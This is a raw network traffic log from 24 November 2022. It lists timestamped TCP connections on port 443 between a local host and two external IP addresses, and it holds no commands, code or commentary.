Nov 24, 2022 12:20:52.878914118 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.878947973 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.879018068 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.879201889 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.879271030 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.879520893 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:52.879652023 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.919472933 CET	49749	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:52.919514894 CET	443	49749	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.160939932 CET	49752	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.161012888 CET	443	49752	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.161127090 CET	49752	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.161653996 CET	49752	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.161688089 CET	443	49752	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.161820889 CET	443	49752	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.351206064 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.351283073 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.351401091 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.360129118 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.360186100 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.395826101 CET	49754	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.395915985 CET	443	49754	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.396449089 CET	49754	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.396827936 CET	49754	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.396855116 CET	443	49754	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.397028923 CET	443	49754	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.408253908 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.408359051 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.455573082 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.455601931 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.466908932 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.466943979 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.532669067 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.532871008 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.532896042 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.532975912 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.560010910 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.560297012 CET	443	49753	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.560437918 CET	49753	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.722657919 CET	49755	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.722724915 CET	443	49755	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.722820044 CET	49755	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.723191023 CET	49755	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.723218918 CET	443	49755	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.723280907 CET	443	49755	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.906831026 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.906907082 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.907016039 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.913753986 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.913788080 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.966388941 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:53.966542006 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:53.967870951 CET	49757	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.967931032 CET	443	49757	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.968028069 CET	49757	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.968424082 CET	49757	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:53.968441963 CET	443	49757	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:53.968538046 CET	443	49757	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.026813984 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.026850939 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.027832031 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.027909040 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.028655052 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.028666019 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.096959114 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.097076893 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.097114086 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.097148895 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.097177029 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.097203016 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.164730072 CET	49756	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.164769888 CET	443	49756	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.285758972 CET	49758	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.285830021 CET	443	49758	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.285907984 CET	49758	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.286312103 CET	49758	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.286356926 CET	443	49758	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.286448002 CET	443	49758	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.455511093 CET	49760	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.455583096 CET	443	49760	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.455672026 CET	49760	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.456054926 CET	49760	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.456075907 CET	443	49760	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.456144094 CET	443	49760	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.457457066 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.457514048 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.457600117 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.458903074 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.458930969 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.530477047 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.530570030 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.572300911 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.572335958 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.577974081 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.578003883 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.650342941 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.650459051 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.650489092 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.650553942 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.686944962 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.687124968 CET	443	49759	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:54.687258959 CET	49759	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:54.926493883 CET	49761	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.926556110 CET	443	49761	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.927078009 CET	49761	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.930563927 CET	49761	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:54.930597067 CET	443	49761	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:54.930643082 CET	443	49761	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.211822987 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.211888075 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.212682962 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.214124918 CET	49763	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.214183092 CET	443	49763	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.214262009 CET	49763	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.214864016 CET	49763	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.214905977 CET	443	49763	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.214967966 CET	443	49763	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.348148108 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.348179102 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.416893005 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.417082071 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.447472095 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.447504997 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.447973013 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.448030949 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.448841095 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.448852062 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.461718082 CET	49764	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.461771011 CET	443	49764	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.461857080 CET	49764	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.462352991 CET	49764	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.462366104 CET	443	49764	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.462522984 CET	443	49764	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.575576067 CET	49765	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.575639009 CET	443	49765	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.575726032 CET	49765	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.576132059 CET	49765	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.576155901 CET	443	49765	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.576205969 CET	443	49765	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.608982086 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.609078884 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.609169960 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.651288033 CET	49762	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.651314974 CET	443	49762	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.781320095 CET	49766	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.781369925 CET	443	49766	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.781471968 CET	49766	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.782330990 CET	49766	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.782347918 CET	443	49766	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.782418966 CET	443	49766	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.786289930 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.786330938 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.786422968 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.786969900 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.786982059 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.831693888 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.831803083 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.876467943 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.876492023 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.882673979 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:55.882692099 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:55.898483038 CET	49768	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.898551941 CET	443	49768	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.898636103 CET	49768	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.905005932 CET	49768	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:55.905035973 CET	443	49768	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:55.905107975 CET	443	49768	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.018701077 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.018831968 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.018893957 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.018975973 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.024034023 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.024283886 CET	443	49767	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.024370909 CET	49767	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.185549974 CET	49769	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.185607910 CET	443	49769	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.185705900 CET	49769	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.186115026 CET	49769	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.186139107 CET	443	49769	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.186196089 CET	443	49769	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.230956078 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.231005907 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.231148005 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.243813992 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.243844986 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.291649103 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.291774035 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.344903946 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.344938993 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.345777988 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.345874071 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.346559048 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.346570015 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.409392118 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.409466982 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.409492016 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.409512043 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.409548998 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.409567118 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.419054985 CET	49770	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.419097900 CET	443	49770	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.565287113 CET	49771	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.565335989 CET	443	49771	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.565427065 CET	49771	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.565845013 CET	49771	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.565856934 CET	443	49771	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.565960884 CET	443	49771	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.677314043 CET	49772	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.677367926 CET	443	49772	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.677500963 CET	49772	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.677957058 CET	49772	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.677978992 CET	443	49772	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.678047895 CET	443	49772	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.841196060 CET	49773	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.841319084 CET	443	49773	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.841442108 CET	49773	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.841944933 CET	49773	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:56.841983080 CET	443	49773	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.842096090 CET	443	49773	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:56.864216089 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.864289999 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.864372015 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.865292072 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:56.865325928 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.917443037 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:56.917556047 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.015456915 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.015510082 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.019633055 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.019673109 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.084114075 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.084201097 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.084220886 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.084275961 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.084294081 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.084341049 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.117386103 CET	49774	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.117444992 CET	443	49774	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.130027056 CET	49775	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.130072117 CET	443	49775	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.130160093 CET	49775	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.130532980 CET	49775	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.130548000 CET	443	49775	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.130647898 CET	443	49775	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.318238974 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.318331003 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.318461895 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.319277048 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.319322109 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.365802050 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.365925074 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.393183947 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.393205881 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.399549007 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.399569035 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.416846991 CET	49777	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.416907072 CET	443	49777	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.417006969 CET	49777	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.418024063 CET	49777	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.418051004 CET	443	49777	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.418124914 CET	443	49777	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.659526110 CET	49778	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.659594059 CET	443	49778	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.659683943 CET	49778	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.661715984 CET	49778	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.661746979 CET	443	49778	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.661830902 CET	443	49778	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.891129971 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.891262054 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.891282082 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:57.891365051 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.905194044 CET	49779	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.905246019 CET	443	49779	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.905327082 CET	49779	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.915410042 CET	49779	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:57.915446043 CET	443	49779	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.915529966 CET	443	49779	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:57.921124935 CET	49776	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:57.921171904 CET	443	49776	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.075617075 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.075696945 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.076913118 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.082940102 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.083005905 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.112533092 CET	49781	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.112603903 CET	443	49781	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.112714052 CET	49781	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.113034964 CET	49781	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.113059044 CET	443	49781	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.113122940 CET	443	49781	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.141887903 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.142091036 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.166074991 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.166122913 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.175404072 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.175455093 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.269864082 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.269938946 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.270124912 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.283827066 CET	49780	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.283871889 CET	443	49780	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.390290022 CET	49782	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.390352964 CET	443	49782	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.390516043 CET	49782	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.390886068 CET	49782	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.390908957 CET	443	49782	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.390964031 CET	443	49782	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.503856897 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.503912926 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.504014969 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.507069111 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.507097960 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.552185059 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.552301884 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.562247992 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.562306881 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.571546078 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.571577072 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.611536026 CET	49784	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.611601114 CET	443	49784	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.611675978 CET	49784	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.612293959 CET	49784	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.612319946 CET	443	49784	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.612377882 CET	443	49784	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.665817022 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.666302919 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.666328907 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.666419029 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.693428993 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.693546057 CET	443	49783	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:58.693631887 CET	49783	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:58.925566912 CET	49785	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.925625086 CET	443	49785	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.925729036 CET	49785	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.926093102 CET	49785	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:20:58.926115036 CET	443	49785	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:58.926198959 CET	443	49785	51.195.77.208	192.168.2.3
Nov 24, 2022 12:20:59.087178946 CET	49786	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:20:59.087234974 CET	443	49786	172.66.43.60	192.168.2.3
Nov 24, 2022 12:20:59.087338924 CET	49786	443	192.168.2.3	172.66.43.60
